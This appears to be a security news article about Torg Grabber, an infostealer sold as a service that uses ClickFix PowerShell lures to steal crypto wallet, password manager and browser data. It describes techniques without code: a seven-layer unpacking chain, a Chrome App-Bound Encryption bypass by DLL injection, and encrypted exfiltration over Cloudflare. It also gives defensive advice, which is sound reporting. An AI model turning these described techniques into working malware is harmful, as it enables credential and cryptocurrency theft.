Torg Grabber Infostealer Targets 728 Crypto Wallets via ClickFix PowerShell Attack

A newly identified infostealer named Torg Grabber is actively targeting 728 cryptocurrency wallet extensions across 25 browsers, using ClickFix-based PowerShell lures for initial access. Researchers at Gen Digital discovered 334 unique samples developed in just three months, with new command-and-control infrastructure deployed weekly.

Evan Mael

25 March 2026, 00:00 6 min read —

Last updated 25 March 2026, 22:00

SEVERITYHigh

EXPLOITActive Exploit

PATCH STATUSUnavailable

VENDORGen Digital (threat researcher), Multiple browser vendors

AFFECTEDChrome, Edge, Brave, Vivaldi, ...

CATEGORYCybersecurity

Key Takeaways

Torg Grabber is a fast-evolving Malware-as-a-Service (MaaS) infostealer first observed in December 2025
Gen Digital identified 334 unique samples compiled within a 3-month period (Dec 2025 to Feb 2026)
The malware targets 728 cryptocurrency wallet extensions, 103 password managers, and 850 browser extensions total
Initial infection relies on the ClickFix technique, tricking users into running malicious PowerShell commands
Torg Grabber bypasses App-Bound Encryption in Chrome, Edge, Brave, Vivaldi, and Opera to steal stored credentials
Data is exfiltrated via ChaCha20-encrypted HTTPS connections routed through Cloudflare infrastructure
New C2 domains are registered weekly, with 40 distinct operator tags documented by researchers

Torg Grabber: The Infostealer Silently Raiding Your Crypto Wallets

Cybersecurity researchers at Gen Digital have identified a fast-evolving malware-as-a-service threat called Torg Grabber, an information stealer engineered to drain cryptocurrency wallets, harvest browser credentials, and exfiltrate sensitive data at scale. Distributed via the ClickFix social engineering technique, this threat marks a significant escalation in the infostealer landscape.

What Happened

In March 2026, Gen Digital published a detailed technical report exposing Torg Grabber, a credential stealer circulating since December 2025. Initially mistaken for a Vidar variant, deeper analysis revealed an entirely distinct codebase with its own C2 infrastructure and operator network. The firm documented 334 unique compiled samples across a three-month window, with new command-and-control domains registered weekly and an expanding operator base of 40 documented tags.

Technical Details

Torg Grabber gains initial access through the ClickFix technique, hijacking clipboard content to trick victims into executing malicious PowerShell commands. The malware uses a seven-layer unpacking chain (base64, XOR, AES-CBC, hex-encoding, CTR cipher, LZNT1, and AES-CBC transforms) before deploying a 683KB stealer payload entirely in memory. Since December 22, 2025, it bypasses App-Bound Encryption in Chrome, Edge, Brave, Vivaldi, and Opera by injecting a 20KB DLL into a legitimate browser process to extract the master encryption key via COM Elevation Service. Data exfiltration is performed over HTTPS routed through Cloudflare infrastructure, using chunked uploads encrypted with ChaCha20 and authenticated with HMAC-SHA256 tokens.

Impact

Torg Grabber targets 25 Chromium-based browsers and 8 Firefox variants, stealing credentials, cookies, and autofill data from 850 browser extensions. Of these, 728 are cryptocurrency wallet extensions, covering virtually every major and obscure wallet including MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, and OKX. The malware also targets 103 password manager and 2FA extensions (LastPass, 1Password, Bitwarden, Authy), along with 19 note-taking apps, desktop crypto wallet applications, Discord, Telegram, Steam, VPN clients, FTP tools, and email clients. Additionally, it profiles the host system, captures screenshots, steals files from Desktop and Documents folders, and can execute attacker-supplied shellcode.

Mitigation

No patch is applicable for this threat as it is a malware campaign rather than a software vulnerability. Users should never run clipboard-based commands prompted by websites. Organizations are advised to enforce application allowlisting, restrict PowerShell execution via policy, deploy endpoint detection and response (EDR) solutions capable of detecting reflective DLL loading and in-memory execution, and monitor for anomalous HTTPS traffic to Cloudflare-hosted infrastructure. Crypto wallet holders should consider using hardware wallets and enabling all available browser security features.

Frequently Asked Questions

What is Torg Grabber?+

Torg Grabber is a Malware-as-a-Service (MaaS) information stealer that targets cryptocurrency wallet extensions, browser credentials, and sensitive data. It was first identified in December 2025 and is actively developed with new samples released weekly.

How does Torg Grabber infect systems?+

Torg Grabber uses the ClickFix social engineering technique to hijack clipboard content, tricking victims into pasting and executing malicious PowerShell commands. This gives the malware initial access to the compromised system.

Which cryptocurrency wallets are targeted?+

Torg Grabber targets 728 cryptocurrency wallet browser extensions, including major wallets such as MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, OKX, Keplr, Rabby, and hundreds of lesser-known wallets.

Does Torg Grabber bypass Chrome security?+

Yes. Since December 22, 2025, Torg Grabber includes a module that bypasses Google Chrome's App-Bound Encryption (ABE) by injecting a DLL into the browser process to extract the master encryption key via COM Elevation Service.

Is there a patch available for Torg Grabber?+

No. Torg Grabber is a malware campaign, not a software vulnerability. Protection relies on security awareness, EDR solutions, PowerShell restrictions, and use of hardware wallets for cryptocurrency storage.

About the Author

Evan Mael

Senior IT Journalist & Cloud Architect

Microsoft MCSA-certified Cloud Architect | Fortinet-focused. I modernize cloud, hybrid & on-prem infrastructure for reliability, security, performance and cost control - sharing field-tested ops & troubleshooting.